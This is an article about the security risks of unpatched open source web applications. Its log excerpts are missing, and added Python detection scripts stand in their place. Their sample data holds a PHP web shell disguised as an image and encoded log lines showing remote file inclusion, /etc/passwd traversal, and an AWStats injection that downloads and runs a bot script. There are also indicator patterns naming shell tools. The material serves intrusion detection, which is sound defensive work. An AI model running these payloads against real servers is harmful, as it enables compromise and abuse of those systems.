
OpenSource is free but highly vulnerable

One of the controversial articles on open source by Openpages.info
Important: the purpose of this article is not to oppose the use of open source software, but to stress how much professionalism and disciplined system administration a server running open source software needs.

So you are using open source software, but are you sure you are running only the software you installed? Are you sure you are not also running spyware or adware that was planted inside your open source application through a security hole?

Remember that being hacked is NOT when you see a message on your website saying "Your site is defaced" or "You are hacked". That kind of attacker has actually done you a favour by being noisy: now you know, and you get a chance to patch the hole. Such script kiddies rarely understand what they are running; they take sample exploit code from some security website and use it to plant a message like the one above, just to show off.

The real problem is when you don't know what is going on behind the scenes. You may have been running a hidden application for years without knowing it. As a shared hosting customer it is perhaps 10% your responsibility, but 90% lies with the server manager or hosting provider, who rarely spends enough time going through the server logs for ATTEMPTS made against the server or against any of the websites hosted on it.

But why is open source so dangerous? Good question. It is as if the bad guys had the floor plan of your home: they know where the safe is and how the alarm is triggered, so they can dig through exactly the right wall. With open source the full code is available to everyone, and everyone includes the bad guys as well as the good guys. Both are mostly programmers, and both find weaknesses in the software. The bad guys exploit them and, often just to get attention, publish them on public forums or IRC channels. The good guys report them to the developers. The developers fix the holes and release the next version or a patch, and that release ships with a document titled CHANGELOG, which usually describes the security holes fixed since the previous version and recommends upgrading. Either way the details of the holes are now public, and every installation that has not upgraded is a known target.

The bad guys run scanning scripts and bots against websites. These detect which open source applications are installed and read their version numbers, match those versions against a database of exploitable releases, and some even run simple probes to confirm that your installation has not been patched or upgraded. The result is stored for the attacker. That's it... you are TAGGED.

Now what will the bad guys do to my site/server? Hmm! They usually do one or more of the following (not limited to):

  • Inject code into the application's files so that it sends passwords to the attacker. For a detailed practical example, see the PHP Security Consortium.
  • Obtain admin rights in your application through session hijacking. For a detailed practical example, see the PHP Security Consortium.
  • Browse the server's directories. For a detailed practical example, see the PHP Security Consortium.
  • The most common and most dangerous: execute shell commands. Once they can run shell commands they usually download, compile and run an IRC service in a world-writable directory, mostly /tmp or /var/tmp, and that IRC service is then used to distribute warez and pirated CDs.
  • Inject JavaScript into your PHP/HTML pages. Sometimes it shows ad pop-ups to your visitors, sometimes it redirects them to the attacker's marketing sites, or it generates clicks on their Google AdWords ads.
  • Send spam, the most common task of all. They install some kind of mail gateway script on your site and drive it from their own software to send spam through your site/server.
  • If the exploited application is not a web application but a service running as root, such as FTP or SSH, then BAM. The first thing they do is install a backdoor: a tiny program listening on an uncommon port that gives the remote attacker a root shell on your server. The second thing they try is a rootkit, but experienced attackers know that most old rootkits do not work on current operating systems, so unless you run a very old operating system there is little chance of that succeeding.
  • Use your server as a proxy for credit card fraud. A card belonging to a US citizen used from a Brazilian or Asian IP address is very likely to be refused by the fraud screening on the transaction server, so they route the purchase through a hacked proxy in the USA to fool the AVS and geolocation checks.
  • DDoS, less common but effective. They keep a list of servers they can exploit at any time and, when they need to launch a distributed denial of service attack, use your site as one of its sources.

    So as an open source user, what can you do? When did you last check the developer's website for updates to the software you are using? If you have a dedicated server, when did you last check the server logs for unusual strings in POST and GET requests, or for failed TCP connection attempts with protocol errors on your public ports? I know most of you did not, because your shared hosting provider gives you one-click installation of most open source packages but never provides an automated way to update them. For most open source web applications there is practically no way a host can integrate automated updates into its control panel, because every new upgrade can be different from the previous one.

    And as a server admin you may be using a panel like Webmin, Plesk or cPanel and never have looked at the server logs or checked whether your kernel is up to date. Are you using lots of colourful add-ons and plugins with your open source installation? Do you know the authenticity of the site you downloaded that plugin from? Is its author keeping it up to date? Are you using a dead open source application, script, add-on or plugin? ........THINK AGAIN.

    It is not too hard to monitor your open source packages through logs. Below are some examples taken from compromised production servers. I have changed some information in the data for my own reasons.

    An image on the site was replaced with an executable script, and that script provides shell access through the web. This was identified by the suspicious line below in the log file:
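    One way to catch the "image that is really a script" case above, and the executables dropped into /tmp described in the list of attacker actions earlier, is to check every file's content against what its name and permissions claim. This is an added example written for this article, not code from Openpages.info; the upload directory it builds and the three sample files in it are constructed for the demonstration, and the indicator names are my own.

```python
"""Scan a directory for files whose content does not match their extension
(a PHP web shell saved as "logo.jpg") and for executables dropped into a
world-writable directory. Added example; sample files are constructed."""
import os
import re
import stat
import tempfile

# Magic bytes for the image types a typical upload directory should contain.
IMAGE_MAGIC = {
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
}
# A PHP open tag anywhere in an "image" means the web server may execute it.
PHP_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)


def classify(path):
    """Return a list of findings for one file; an empty list means it looks clean."""
    findings = []
    ext = os.path.splitext(path)[1].lower()
    with open(path, "rb") as fh:
        body = fh.read(1 << 20)  # the first MiB is plenty to spot a shell
    head = body[:8]
    if ext in IMAGE_MAGIC and not any(head.startswith(m) for m in IMAGE_MAGIC[ext]):
        findings.append("extension/magic mismatch")
    if PHP_TAG.search(body):
        findings.append("contains PHP open tag")
    if os.stat(path).st_mode & (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH):
        findings.append("executable bit set")
    if head.startswith(b"\x7fELF"):
        findings.append("ELF binary")
    elif head.startswith(b"#!"):
        findings.append("script with shebang")
    return findings


def scan(root):
    """Walk `root` and return {relative path: findings} for every suspicious file."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if os.path.islink(path):
                continue
            findings = classify(path)
            if findings:
                hits[os.path.relpath(path, root)] = findings
    return hits


def demo():
    """Build a constructed upload directory (not real data) and scan it."""
    root = tempfile.mkdtemp()
    with open(os.path.join(root, "real.png"), "wb") as fh:   # genuine image
        fh.write(b"\x89PNG\r\n\x1a\n" + b"\x00" * 32)
    with open(os.path.join(root, "logo.jpg"), "wb") as fh:   # web shell disguised as an image
        fh.write(b"<?php system($_GET['c']); ?>")
    with open(os.path.join(root, "tmp_bot"), "wb") as fh:    # dropped binary, chmod +x
        fh.write(b"\x7fELF" + b"\x00" * 16)
    os.chmod(os.path.join(root, "tmp_bot"), 0o755)
    return scan(root)


if __name__ == "__main__":
    for path, findings in demo().items():
        print(path + ": " + ", ".join(findings))
```

    Run it as `scan("/var/www/uploads")` and `scan("/tmp")` from cron; on a real server compare the result with the previous run so that only new findings raise an alert.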


    A bot attempting random usernames and passwords on the SSH port, hoping for a lucky hit. Log entries like these are very common:
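    The SSH guessing above is easy to summarise from the sshd messages in syslog, and the case that matters most is a successful password login from an address that had just been guessing. This is an added example, not code from Openpages.info; the log lines are constructed samples in the format OpenSSH writes (older releases say "illegal user" where newer ones say "invalid user"), and the threshold of five failures is my own choice.

```python
"""Summarise SSH password guessing from sshd syslog lines and flag a
successful login from a host that had been guessing. Added example; the
sample log is constructed, not a real capture."""
import re
from collections import defaultdict

# Failed/Accepted password messages from OpenSSH; the "invalid user" /
# "illegal user" prefix appears when the account does not exist.
AUTH_RE = re.compile(
    r"sshd\[\d+\]: (?P<result>Failed|Accepted) password for "
    r"(?:invalid user |illegal user )?(?P<user>\S+) from (?P<ip>\d+\.\d+\.\d+\.\d+)"
)

SAMPLE_LOG = """\
Jan 12 03:14:07 web1 sshd[2345]: Failed password for invalid user admin from 203.0.113.5 port 43210 ssh2
Jan 12 03:14:09 web1 sshd[2346]: Failed password for invalid user oracle from 203.0.113.5 port 43211 ssh2
Jan 12 03:14:11 web1 sshd[2347]: Failed password for root from 203.0.113.5 port 43212 ssh2
Jan 12 03:14:13 web1 sshd[2348]: Failed password for root from 203.0.113.5 port 43213 ssh2
Jan 12 03:14:15 web1 sshd[2349]: Failed password for invalid user test from 203.0.113.5 port 43214 ssh2
Jan 12 03:14:18 web1 sshd[2350]: Failed password for invalid user guest from 203.0.113.5 port 43215 ssh2
Jan 12 03:15:40 web1 sshd[2398]: Accepted password for root from 203.0.113.5 port 43299 ssh2
Jan 12 08:02:01 web1 sshd[2601]: Failed password for alice from 198.51.100.7 port 51000 ssh2
Jan 12 08:02:05 web1 sshd[2602]: Accepted publickey for alice from 198.51.100.7 port 51001 ssh2
"""


def analyse(log_text, threshold=5):
    """Return (failures per IP, usernames tried per IP, suspicious logins).

    A login is suspicious when it is an Accepted *password* event from an IP
    that already had at least `threshold` failures earlier in the log."""
    failures = defaultdict(int)
    users = defaultdict(set)
    suspicious = []
    for line in log_text.splitlines():
        m = AUTH_RE.search(line)
        if not m:
            continue  # other sshd lines, including public-key logins
        ip, user = m["ip"], m["user"]
        if m["result"] == "Failed":
            failures[ip] += 1
            users[ip].add(user)
        elif failures[ip] >= threshold:
            suspicious.append((ip, user))
    return dict(failures), {ip: sorted(u) for ip, u in users.items()}, suspicious


if __name__ == "__main__":
    failures, users, suspicious = analyse(SAMPLE_LOG)
    for ip, n in sorted(failures.items(), key=lambda kv: -kv[1]):
        print(ip, n, "failures, users tried:", ", ".join(users[ip]))
    for ip, user in suspicious:
        print("ALERT: password login as", user, "from guessing host", ip)
```

    Feed it `open("/var/log/auth.log").read()` (or `/var/log/secure` on Red Hat style systems). A single failure from a known address, like alice's typo above, is noise; a burst of non-existent usernames followed by an accepted password is the "lucky access" the article warns about.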

    An older version of Mambo exploited. The log has the record below; copy it into a URL decoder and you will get a clear idea of what is going on:

    AWStats exploited. Decode it in a URL decoder to get an idea of what is going on:


    An open source help desk exploited. Yes, decode it to see what is going on:
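    The three web-application cases above (Mambo, AWStats, the help desk) and the earlier advice to look for unusual strings in POST and GET requests all come down to the same routine: URL-decode the request and look for what exploit traffic leaves behind. This is an added example, not code from Openpages.info; the access log lines are constructed samples in the general shape of remote file inclusion, command injection and path traversal requests, not the article's own records, and the indicator list is my own.

```python
"""Decode request lines from an Apache/nginx access log (combined format)
and flag the indicators web-application exploit traffic leaves behind.
Added example; the sample log is constructed, not a real capture."""
import re
from urllib.parse import unquote_plus

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Applied to the fully decoded request target, in this order.
INDICATORS = [
    ("remote file inclusion", re.compile(r"=\s*(?:https?|ftp)://", re.I)),
    ("path traversal", re.compile(r"(?:\.\./){2,}")),
    ("shell command", re.compile(r"[|;`]\s*(?:cd|wget|curl|lynx|fetch|chmod|perl|python|sh|bash|uname|id)\b")),
    ("writable staging dir", re.compile(r"/(?:var/)?tmp\b|/dev/shm\b")),
    ("embedded code", re.compile(r"<\?(?:php|=)|<script\b", re.I)),
    ("sql injection", re.compile(r"\bunion\b.{0,40}\bselect\b|'\s*or\s+1=1", re.I)),
]

SAMPLE_LOG = """\
203.0.113.9 - - [12/Jan/2006:03:22:11 +0000] "GET /index.php?option=com_content&task=view&id=12 HTTP/1.1" 200 8120 "-" "Mozilla/5.0"
203.0.113.9 - - [12/Jan/2006:03:22:15 +0000] "GET /index.php?option=com_content&mosConfig_absolute_path=http%3A%2F%2F198.51.100.23%2Fcmd.txt%3F%26cmd%3Did HTTP/1.1" 200 3321 "-" "Mozilla/4.0"
203.0.113.9 - - [12/Jan/2006:03:22:40 +0000] "GET /cgi-bin/awstats.pl?configdir=%7Cecho%3Bcd%20%2Ftmp%3Bwget%20198.51.100.23%2Fbot.pl%3Bperl%20bot.pl%3Becho%7C HTTP/1.1" 200 612 "-" "Mozilla/4.0"
203.0.113.9 - - [12/Jan/2006:03:23:02 +0000] "GET /helpdesk/index.php?page=..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1401 "-" "Mozilla/4.0"
198.51.100.7 - - [12/Jan/2006:08:10:44 +0000] "POST /login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""


def fully_decode(s, rounds=3):
    """URL-decode until stable: scanners double-encode to slip past naive filters."""
    for _ in range(rounds):
        decoded = unquote_plus(s)
        if decoded == s:
            break
        s = decoded
    return s


def analyse_line(line):
    """Parse one log line; return None if it is not in combined format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    decoded = fully_decode(m["target"])
    hits = [name for name, rx in INDICATORS if rx.search(decoded)]
    return {"ip": m["ip"], "status": m["status"], "decoded": decoded, "indicators": hits}


def suspicious(log_text):
    """All parsed lines that triggered at least one indicator, in log order."""
    return [r for r in map(analyse_line, log_text.splitlines()) if r and r["indicators"]]


if __name__ == "__main__":
    for r in suspicious(SAMPLE_LOG):
        print(r["ip"], r["status"], ", ".join(r["indicators"]))
        print("    " + r["decoded"])
```

    Note the status codes: a 200 on a request like the second or third line means the application answered it, which is the moment to pull the process list and /tmp, not just block the address. Only the request line is visible here; POST bodies are not written to the access log, so for POST-based attacks you need the application's own logging or a module such as mod_security.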


    The output of "pstree" and "ps -ax" includes the line below on a server with the zk rootkit installed:



    ZK rootkit files installed on a compromised server:
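    When a rootkit of this kind replaces ps and pstree, the trojaned binaries omit the attacker's processes, but the kernel still lists every process as a numbered directory under /proc. Comparing the two is a cheap first check. This is an added example, not code from Openpages.info and not specific to the zk rootkit; the fake /proc tree and fake ps output in `demo()` are constructed, and the PID 31337 in them is invented for the demonstration.

```python
"""Compare the process IDs listed under /proc with those reported by ps.
A user-space rootkit that trojans ps hides processes from it but cannot
remove their /proc entries. Added example; demo data is constructed."""
import os
import re
import subprocess
import tempfile


def pids_from_proc(proc_root="/proc"):
    """The kernel exposes one all-digit directory per process under /proc."""
    pids = set()
    for name in os.listdir(proc_root):
        if name.isdigit() and os.path.isdir(os.path.join(proc_root, name)):
            pids.add(int(name))
    return pids


def pids_from_ps_output(text):
    """Parse ps output whose first column is the PID (a PID header line is skipped)."""
    pids = set()
    for line in text.splitlines():
        m = re.match(r"\s*(\d+)(?:\s|$)", line)
        if m:
            pids.add(int(m.group(1)))
    return pids


def hidden_pids(before, ps_pids, after):
    """PIDs present in /proc both before and after ps ran, yet missing from ps.
    Requiring both listings drops processes that merely started or exited
    while ps was running, which are the usual false positives."""
    return sorted((before & after) - ps_pids)


def check_live():
    """Run the check against the real /proc and ps (Linux only)."""
    before = pids_from_proc()
    ps = subprocess.run(["ps", "-e", "-o", "pid="], capture_output=True, text=True, check=True)
    after = pids_from_proc()
    return hidden_pids(before, pids_from_ps_output(ps.stdout), after)


def demo():
    """Constructed fake /proc tree and fake ps output (not a real capture):
    the trojaned ps omits the attacker's process, here PID 31337."""
    fake_proc = tempfile.mkdtemp()
    for name in ("1", "42", "31337", "sys", "net"):
        os.mkdir(os.path.join(fake_proc, name))
    open(os.path.join(fake_proc, "uptime"), "w").close()
    fake_ps = (
        "  PID TTY          TIME CMD\n"
        "    1 ?        00:00:01 init\n"
        "   42 ?        00:00:00 sshd\n"
    )
    proc_pids = pids_from_proc(fake_proc)
    return hidden_pids(proc_pids, pids_from_ps_output(fake_ps), proc_pids)


if __name__ == "__main__":
    print("demo, hidden PIDs:", demo())
    if os.path.isdir("/proc"):
        print("live, hidden PIDs:", check_live())
```

    The caveat: this only catches user-space rootkits that trojan the binaries. A kernel-level rootkit hides the /proc entries as well, so a clean result here proves nothing on its own; the reliable answer comes from booting the machine from a trusted medium and inspecting the disk, which is also the only sane way to recover once a rootkit is confirmed.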



    This article is exclusively written for and by Openpages.info. It may be used freely on any other website with a reference to openpages.info.

    All trade marks are property of respective owners
    All rights reserved 2003-2007, Openpages.info, Multan, Pakistan